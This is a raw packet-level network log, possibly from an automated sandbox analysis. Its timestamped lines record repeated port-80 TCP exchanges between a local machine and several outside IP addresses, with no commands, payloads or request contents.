                                                                                                                        Nov 20, 2024 16:54:34.119820118 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:34.121443987 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:34.124196053 CET4985180192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:34.130259037 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:34.130551100 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:34.130738020 CET4985180192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:34.138884068 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:34.139018059 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:34.139187098 CET4985180192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:34.145011902 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:34.145235062 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:34.145401955 CET4985180192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:34.153462887 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:34.153954983 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:34.156244040 CET4985180192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:34.193778992 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:34.193857908 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:34.194072962 CET4985180192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:34.305548906 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:34.305826902 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:34.305953026 CET4985180192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:34.308567047 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:34.308721066 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:34.308888912 CET4985180192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:34.314466953 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:34.314634085 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:34.314733028 CET4985180192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:34.320532084 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:34.320547104 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:34.320658922 CET4985180192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:34.326719999 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:34.327007055 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:34.327100039 CET4985180192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:34.333298922 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:34.333331108 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:34.333441019 CET4985180192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:34.335988998 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:34.336014032 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:34.336097002 CET4985180192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:34.339068890 CET4985180192.168.2.1143.163.1.110
                                                                                                                        Nov 20, 2024 16:54:34.458594084 CET804985143.163.1.110192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:39.901946068 CET4986880192.168.2.1147.254.140.255
                                                                                                                        Nov 20, 2024 16:54:40.021485090 CET804986847.254.140.255192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:40.021787882 CET4986880192.168.2.1147.254.140.255
                                                                                                                        Nov 20, 2024 16:54:40.038867950 CET4986880192.168.2.1147.254.140.255
                                                                                                                        Nov 20, 2024 16:54:40.159199953 CET804986847.254.140.255192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:41.382460117 CET804986847.254.140.255192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:41.382479906 CET804986847.254.140.255192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:41.382648945 CET4986880192.168.2.1147.254.140.255
                                                                                                                        Nov 20, 2024 16:54:41.382786989 CET804986847.254.140.255192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:41.382879972 CET4986880192.168.2.1147.254.140.255
                                                                                                                        Nov 20, 2024 16:54:41.548768044 CET4986880192.168.2.1147.254.140.255
                                                                                                                        Nov 20, 2024 16:54:42.567847013 CET4987580192.168.2.1147.254.140.255
                                                                                                                        Nov 20, 2024 16:54:42.690943003 CET804987547.254.140.255192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:42.691179991 CET4987580192.168.2.1147.254.140.255
                                                                                                                        Nov 20, 2024 16:54:42.710643053 CET4987580192.168.2.1147.254.140.255
                                                                                                                        Nov 20, 2024 16:54:42.830398083 CET804987547.254.140.255192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:44.010560989 CET804987547.254.140.255192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:44.010575056 CET804987547.254.140.255192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:44.010704994 CET804987547.254.140.255192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:44.010751009 CET4987580192.168.2.1147.254.140.255
                                                                                                                        Nov 20, 2024 16:54:44.010751009 CET4987580192.168.2.1147.254.140.255
                                                                                                                        Nov 20, 2024 16:54:44.220518112 CET4987580192.168.2.1147.254.140.255
                                                                                                                        Nov 20, 2024 16:54:45.239512920 CET4988380192.168.2.1147.254.140.255
                                                                                                                        Nov 20, 2024 16:54:45.360771894 CET804988347.254.140.255192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:45.360877037 CET4988380192.168.2.1147.254.140.255
                                                                                                                        Nov 20, 2024 16:54:45.376678944 CET4988380192.168.2.1147.254.140.255
                                                                                                                        Nov 20, 2024 16:54:45.499049902 CET804988347.254.140.255192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:45.499080896 CET804988347.254.140.255192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:46.808352947 CET804988347.254.140.255192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:46.808371067 CET804988347.254.140.255192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:46.808496952 CET4988380192.168.2.1147.254.140.255
                                                                                                                        Nov 20, 2024 16:54:46.808763027 CET804988347.254.140.255192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:46.808913946 CET4988380192.168.2.1147.254.140.255
                                                                                                                        Nov 20, 2024 16:54:46.892921925 CET4988380192.168.2.1147.254.140.255
                                                                                                                        Nov 20, 2024 16:54:47.918828011 CET4988980192.168.2.1147.254.140.255
                                                                                                                        Nov 20, 2024 16:54:48.039876938 CET804988947.254.140.255192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:48.040024042 CET4988980192.168.2.1147.254.140.255
                                                                                                                        Nov 20, 2024 16:54:48.059866905 CET4988980192.168.2.1147.254.140.255
                                                                                                                        Nov 20, 2024 16:54:48.184187889 CET804988947.254.140.255192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:49.320790052 CET804988947.254.140.255192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:49.320808887 CET804988947.254.140.255192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:49.320822001 CET804988947.254.140.255192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:49.321171045 CET4988980192.168.2.1147.254.140.255
                                                                                                                        Nov 20, 2024 16:54:49.324481964 CET4988980192.168.2.1147.254.140.255
                                                                                                                        Nov 20, 2024 16:54:49.450423002 CET804988947.254.140.255192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:54.976304054 CET4990580192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:54:55.098500013 CET8049905208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:55.098694086 CET4990580192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:54:55.114777088 CET4990580192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:54:55.234339952 CET8049905208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:56.333169937 CET8049905208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:56.333264112 CET4990580192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:54:56.627336025 CET4990580192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:54:56.747123957 CET8049905208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:57.645924091 CET4991280192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:54:57.765851974 CET8049912208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:57.765981913 CET4991280192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:54:57.781326056 CET4991280192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:54:57.901062965 CET8049912208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:58.972336054 CET8049912208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:54:58.972414970 CET4991280192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:54:59.282883883 CET4991280192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:54:59.402698994 CET8049912208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:00.302006960 CET4991980192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:55:00.424525023 CET8049919208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:00.424635887 CET4991980192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:55:00.441749096 CET4991980192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:55:00.561355114 CET8049919208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:00.561395884 CET8049919208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:01.585025072 CET8049919208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:01.585155964 CET4991980192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:55:01.954690933 CET4991980192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:55:02.074172974 CET8049919208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:02.974020004 CET4992580192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:55:03.096756935 CET8049925208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:03.097006083 CET4992580192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:55:03.115202904 CET4992580192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:55:03.235470057 CET8049925208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:06.930114031 CET8049925208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:06.930134058 CET8049925208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:06.930278063 CET8049925208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:06.930289030 CET4992580192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:55:06.930301905 CET8049925208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:06.930315018 CET8049925208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:06.930347919 CET4992580192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:55:06.930357933 CET8049925208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:06.930371046 CET8049925208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:06.930382967 CET8049925208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:06.930393934 CET8049925208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:06.930406094 CET4992580192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:55:06.930433989 CET4992580192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:55:06.930448055 CET8049925208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:06.930491924 CET4992580192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:55:07.050081015 CET8049925208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:07.050121069 CET8049925208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:07.050271034 CET4992580192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:55:07.054419041 CET8049925208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:07.095271111 CET4992580192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:55:07.122948885 CET8049925208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:07.123064041 CET8049925208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:07.123187065 CET4992580192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:55:07.127149105 CET8049925208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:07.127279997 CET8049925208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:07.127374887 CET4992580192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:55:07.135541916 CET8049925208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:07.138649940 CET8049925208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:07.138665915 CET8049925208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:07.138710022 CET4992580192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:55:07.146261930 CET8049925208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:07.146337986 CET4992580192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:55:07.146447897 CET8049925208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:07.155272007 CET8049925208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:07.155345917 CET4992580192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:55:07.155401945 CET8049925208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:07.164017916 CET8049925208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:07.164073944 CET4992580192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:55:07.164186954 CET8049925208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:07.172427893 CET8049925208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:07.172446012 CET8049925208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:07.172486067 CET4992580192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:55:07.181397915 CET8049925208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:07.181469917 CET4992580192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:55:07.181534052 CET8049925208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:07.189327002 CET8049925208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:07.189342976 CET8049925208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:07.189526081 CET4992580192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:55:07.197565079 CET8049925208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:07.197632074 CET4992580192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:55:07.197709084 CET8049925208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:07.215600014 CET8049925208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:07.215734005 CET4992580192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:55:07.314246893 CET8049925208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:07.314390898 CET8049925208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:07.314502001 CET4992580192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:55:07.316698074 CET8049925208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:07.316780090 CET8049925208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:07.316834927 CET4992580192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:55:07.321995020 CET8049925208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:07.322036028 CET8049925208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:07.322129011 CET4992580192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:55:07.327040911 CET8049925208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:07.327142954 CET4992580192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:55:07.331109047 CET4992580192.168.2.11208.91.197.27
                                                                                                                        Nov 20, 2024 16:55:07.455256939 CET8049925208.91.197.27192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:12.816284895 CET4994880192.168.2.11172.67.220.36
                                                                                                                        Nov 20, 2024 16:55:12.937536955 CET8049948172.67.220.36192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:12.937755108 CET4994880192.168.2.11172.67.220.36
                                                                                                                        Nov 20, 2024 16:55:12.960253000 CET4994880192.168.2.11172.67.220.36
                                                                                                                        Nov 20, 2024 16:55:13.082515955 CET8049948172.67.220.36192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:14.343144894 CET8049948172.67.220.36192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:14.343223095 CET8049948172.67.220.36192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:14.343369007 CET8049948172.67.220.36192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:14.343539000 CET8049948172.67.220.36192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:14.345721006 CET4994880192.168.2.11172.67.220.36
                                                                                                                        Nov 20, 2024 16:55:14.471843004 CET4994880192.168.2.11172.67.220.36
                                                                                                                        Nov 20, 2024 16:55:15.489608049 CET4995480192.168.2.11172.67.220.36
                                                                                                                        Nov 20, 2024 16:55:15.610754013 CET8049954172.67.220.36192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:15.610841036 CET4995480192.168.2.11172.67.220.36
                                                                                                                        Nov 20, 2024 16:55:15.628317118 CET4995480192.168.2.11172.67.220.36
                                                                                                                        Nov 20, 2024 16:55:15.747931004 CET8049954172.67.220.36192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:16.826105118 CET8049954172.67.220.36192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:16.826212883 CET8049954172.67.220.36192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:16.826376915 CET4995480192.168.2.11172.67.220.36
                                                                                                                        Nov 20, 2024 16:55:16.827446938 CET8049954172.67.220.36192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:16.827586889 CET4995480192.168.2.11172.67.220.36
                                                                                                                        Nov 20, 2024 16:55:17.142255068 CET4995480192.168.2.11172.67.220.36
                                                                                                                        Nov 20, 2024 16:55:18.162247896 CET4996280192.168.2.11172.67.220.36
                                                                                                                        Nov 20, 2024 16:55:18.282856941 CET8049962172.67.220.36192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:18.286349058 CET4996280192.168.2.11172.67.220.36
                                                                                                                        Nov 20, 2024 16:55:18.301808119 CET4996280192.168.2.11172.67.220.36
                                                                                                                        Nov 20, 2024 16:55:18.421542883 CET8049962172.67.220.36192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:18.421560049 CET8049962172.67.220.36192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:19.682022095 CET8049962172.67.220.36192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:19.682040930 CET8049962172.67.220.36192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:19.682106972 CET4996280192.168.2.11172.67.220.36
                                                                                                                        Nov 20, 2024 16:55:19.682591915 CET8049962172.67.220.36192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:19.682729959 CET4996280192.168.2.11172.67.220.36
                                                                                                                        Nov 20, 2024 16:55:19.814117908 CET4996280192.168.2.11172.67.220.36
                                                                                                                        Nov 20, 2024 16:55:20.834223986 CET4996880192.168.2.11172.67.220.36
                                                                                                                        Nov 20, 2024 16:55:20.959979057 CET8049968172.67.220.36192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:20.960092068 CET4996880192.168.2.11172.67.220.36
                                                                                                                        Nov 20, 2024 16:55:20.971776962 CET4996880192.168.2.11172.67.220.36
                                                                                                                        Nov 20, 2024 16:55:21.091231108 CET8049968172.67.220.36192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:22.299103975 CET8049968172.67.220.36192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:22.299236059 CET8049968172.67.220.36192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:22.299252987 CET8049968172.67.220.36192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:22.299267054 CET8049968172.67.220.36192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:22.299279928 CET8049968172.67.220.36192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:22.299292088 CET8049968172.67.220.36192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:22.299376965 CET4996880192.168.2.11172.67.220.36
                                                                                                                        Nov 20, 2024 16:55:22.299376965 CET4996880192.168.2.11172.67.220.36
                                                                                                                        Nov 20, 2024 16:55:22.301678896 CET8049968172.67.220.36192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:22.301852942 CET8049968172.67.220.36192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:22.301866055 CET8049968172.67.220.36192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:22.301940918 CET4996880192.168.2.11172.67.220.36
                                                                                                                        Nov 20, 2024 16:55:22.302012920 CET8049968172.67.220.36192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:22.302289009 CET4996880192.168.2.11172.67.220.36
                                                                                                                        Nov 20, 2024 16:55:22.309984922 CET8049968172.67.220.36192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:22.310128927 CET4996880192.168.2.11172.67.220.36
                                                                                                                        Nov 20, 2024 16:55:22.313163996 CET4996880192.168.2.11172.67.220.36
                                                                                                                        Nov 20, 2024 16:55:22.435650110 CET8049968172.67.220.36192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:28.244266987 CET4998580192.168.2.1198.124.224.17
                                                                                                                        Nov 20, 2024 16:55:28.364973068 CET804998598.124.224.17192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:28.365587950 CET4998580192.168.2.1198.124.224.17
                                                                                                                        Nov 20, 2024 16:55:28.380795002 CET4998580192.168.2.1198.124.224.17
                                                                                                                        Nov 20, 2024 16:55:28.502284050 CET804998598.124.224.17192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:29.630335093 CET804998598.124.224.17192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:29.630358934 CET804998598.124.224.17192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:29.630381107 CET804998598.124.224.17192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:29.630412102 CET4998580192.168.2.1198.124.224.17
                                                                                                                        Nov 20, 2024 16:55:29.630454063 CET4998580192.168.2.1198.124.224.17
                                                                                                                        Nov 20, 2024 16:55:29.892281055 CET4998580192.168.2.1198.124.224.17
                                                                                                                        Nov 20, 2024 16:55:30.943847895 CET4999380192.168.2.1198.124.224.17
                                                                                                                        Nov 20, 2024 16:55:31.063750982 CET804999398.124.224.17192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:31.063829899 CET4999380192.168.2.1198.124.224.17
                                                                                                                        Nov 20, 2024 16:55:31.094716072 CET4999380192.168.2.1198.124.224.17
                                                                                                                        Nov 20, 2024 16:55:31.217123985 CET804999398.124.224.17192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:32.286128044 CET804999398.124.224.17192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:32.286179066 CET804999398.124.224.17192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:32.286197901 CET804999398.124.224.17192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:32.286267042 CET4999380192.168.2.1198.124.224.17
                                                                                                                        Nov 20, 2024 16:55:32.630258083 CET4999380192.168.2.1198.124.224.17
                                                                                                                        Nov 20, 2024 16:55:33.645596981 CET4999580192.168.2.1198.124.224.17
                                                                                                                        Nov 20, 2024 16:55:33.769217014 CET804999598.124.224.17192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:33.774552107 CET4999580192.168.2.1198.124.224.17
                                                                                                                        Nov 20, 2024 16:55:33.790893078 CET4999580192.168.2.1198.124.224.17
                                                                                                                        Nov 20, 2024 16:55:33.913348913 CET804999598.124.224.17192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:33.914987087 CET804999598.124.224.17192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:34.993669987 CET804999598.124.224.17192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:34.993690968 CET804999598.124.224.17192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:34.993745089 CET804999598.124.224.17192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:34.993761063 CET4999580192.168.2.1198.124.224.17
                                                                                                                        Nov 20, 2024 16:55:34.993844032 CET4999580192.168.2.1198.124.224.17
                                                                                                                        Nov 20, 2024 16:55:35.298583031 CET4999580192.168.2.1198.124.224.17
                                                                                                                        Nov 20, 2024 16:55:36.317671061 CET4999680192.168.2.1198.124.224.17
                                                                                                                        Nov 20, 2024 16:55:36.439155102 CET804999698.124.224.17192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:36.440862894 CET4999680192.168.2.1198.124.224.17
                                                                                                                        Nov 20, 2024 16:55:36.450654030 CET4999680192.168.2.1198.124.224.17
                                                                                                                        Nov 20, 2024 16:55:36.570558071 CET804999698.124.224.17192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:37.658292055 CET804999698.124.224.17192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:37.658318996 CET804999698.124.224.17192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:37.658330917 CET804999698.124.224.17192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:37.658446074 CET4999680192.168.2.1198.124.224.17
                                                                                                                        Nov 20, 2024 16:55:37.663300991 CET4999680192.168.2.1198.124.224.17
                                                                                                                        Nov 20, 2024 16:55:37.783009052 CET804999698.124.224.17192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:43.237642050 CET4999780192.168.2.11203.161.43.228
                                                                                                                        Nov 20, 2024 16:55:43.357285976 CET8049997203.161.43.228192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:43.357454062 CET4999780192.168.2.11203.161.43.228
                                                                                                                        Nov 20, 2024 16:55:43.373070955 CET4999780192.168.2.11203.161.43.228
                                                                                                                        Nov 20, 2024 16:55:43.498333931 CET8049997203.161.43.228192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:44.638000011 CET8049997203.161.43.228192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:44.638173103 CET8049997203.161.43.228192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:44.639344931 CET4999780192.168.2.11203.161.43.228
                                                                                                                        Nov 20, 2024 16:55:44.877085924 CET4999780192.168.2.11203.161.43.228
                                                                                                                        Nov 20, 2024 16:55:45.896815062 CET4999880192.168.2.11203.161.43.228
                                                                                                                        Nov 20, 2024 16:55:46.020170927 CET8049998203.161.43.228192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:46.020277977 CET4999880192.168.2.11203.161.43.228
                                                                                                                        Nov 20, 2024 16:55:46.038263083 CET4999880192.168.2.11203.161.43.228
                                                                                                                        Nov 20, 2024 16:55:46.158551931 CET8049998203.161.43.228192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:47.294482946 CET8049998203.161.43.228192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:47.294511080 CET8049998203.161.43.228192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:47.294594049 CET4999880192.168.2.11203.161.43.228
                                                                                                                        Nov 20, 2024 16:55:47.548619032 CET4999880192.168.2.11203.161.43.228
                                                                                                                        Nov 20, 2024 16:55:48.568737030 CET4999980192.168.2.11203.161.43.228
                                                                                                                        Nov 20, 2024 16:55:48.688597918 CET8049999203.161.43.228192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:48.690454960 CET4999980192.168.2.11203.161.43.228
                                                                                                                        Nov 20, 2024 16:55:48.708125114 CET4999980192.168.2.11203.161.43.228
                                                                                                                        Nov 20, 2024 16:55:48.828582048 CET8049999203.161.43.228192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:48.828598976 CET8049999203.161.43.228192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:50.040666103 CET8049999203.161.43.228192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:50.040687084 CET8049999203.161.43.228192.168.2.11
                                                                                                                        Nov 20, 2024 16:55:50.046305895 CET4999980192.168.2.11203.161.43.228
